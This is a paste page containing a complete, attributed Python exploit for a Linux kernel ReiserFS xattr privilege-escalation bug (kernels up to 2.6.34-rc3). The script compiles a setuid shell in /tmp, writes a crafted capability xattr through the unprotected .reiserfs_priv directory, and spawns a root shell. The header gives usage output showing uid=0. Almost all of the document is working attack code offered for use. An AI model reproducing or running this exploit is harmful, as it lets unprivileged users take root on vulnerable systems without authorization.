Anu

1. #!/usr/bin/env python
2.  
3. '''
4.  team-edward.py
5.  
6.  Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
7.  Jon Oberheide <jon@oberheide.org>
8.  http://jon.oberheide.org
9.  
10.  Information:
11.  
12.    https://bugzilla.redhat.com/show_bug.cgi?id=568041
13.  
14.    The kernel allows processes to access the internal ".reiserfs_priv"
15.    directory at the top of a reiserfs filesystem which is used to store
16.    xattrs. Permissions are not enforced in that tree, so unprivileged
17.    users can view and potentially modify the xattrs on arbitrary files.
18.  
19.  Usage:
20.  
21.    $ python team-edward.py
22.    [+] checking for reiserfs mount with user_xattr mount option
23.    [+] checking for private xattrs directory at /.reiserfs_priv/xattrs
24.    [+] preparing shell in /tmp
25.    [+] capturing pre-shell snapshot of private xattrs directory
26.    [+] compiling shell in /tmp
27.    [+] setting dummy xattr to get reiserfs object id
28.    [+] capturing post-shell snapshot of private xattrs directory
29.    [+] found 1 new object ids
30.    [+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
31.    [+] spawning setuid shell...
32.    # id
33.    uid=0(root) gid=0(root) groups=4(adm), ...
34.  
35.  Notes:
36.  
37.    Obviously requires a ReiserFS filesystem mounted with extended attributes.
38.    Tested on Ubuntu Jaunty 9.10.
39. '''
40.  
41. import os, sys
42.  
43. SHELL = 'int main(void) { setgid(0); setuid(0); execl("/bin/sh", "sh", 0); }'
44. XATTR = '\x41\x58\x46\x52\xc1\x00\x00\x02\x01\x00\x00\x02\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
45.  
46. def err(txt):
47.     print '[-] error: %s' % txt
48.     sys.exit(1)
49.  
50. def msg(txt):
51.     print '[+] %s' % txt
52.  
53. def main():
54.     msg('checking for reiserfs mount with user_xattr mount option')
55.  
56.     f = open('/etc/fstab')
57.     for line in f:
58.         if 'reiserfs' in line and 'user_xattr' in line:
59.             break
60.     else:
61.         err('failed to find a reiserfs mount with user_xattr')
62.     f.close()
63.  
64.     msg('checking for private xattrs directory at /.reiserfs_priv/xattrs')
65.  
66.     if not os.path.exists('/.reiserfs_priv/xattrs'):
67.         err('failed to locate private xattrs directory')
68.  
69.     msg('preparing shell in /tmp')
70.  
71.     f = open('/tmp/team-edward.c', 'w')
72.     f.write(SHELL)
73.     f.close()
74.  
75.     msg('capturing pre-shell snapshot of private xattrs directory')
76.  
77.     pre = set(os.listdir('/.reiserfs_priv/xattrs'))
78.    
79.     msg('compiling shell in /tmp')
80.  
81.     ret = os.system('gcc -w /tmp/team-edward.c -o /tmp/team-edward')
82.     if ret != 0:
83.         err('error compiling shell, you need gcc')
84.  
85.     msg('setting dummy xattr to get reiserfs object id')
86.  
87.     os.system('setfattr -n "user.hax" -v "hax" /tmp/team-edward')
88.     if ret != 0:
89.         err('error setting xattr, you need setfattr')
90.  
91.     msg('capturing post-shell snapshot of private xattrs directory')
92.  
93.     post = set(os.listdir('/.reiserfs_priv/xattrs'))
94.  
95.     objs = post.difference(pre)
96.  
97.     msg('found %s new object ids' % len(objs))
98.  
99.     for obj in objs:
100.         msg('setting cap_setuid/cap_setgid capabilities on object id %s' % obj)
101.    
102.         f = open('/.reiserfs_priv/xattrs/%s/security.capability' % obj, 'w')
103.         f.write(XATTR)
104.         f.close()
105.  
106.     msg('spawning setuid shell...')
107.  
108.     os.system('/tmp/team-edward')
109.  
110. if __name__ == '__main__':
111.     main()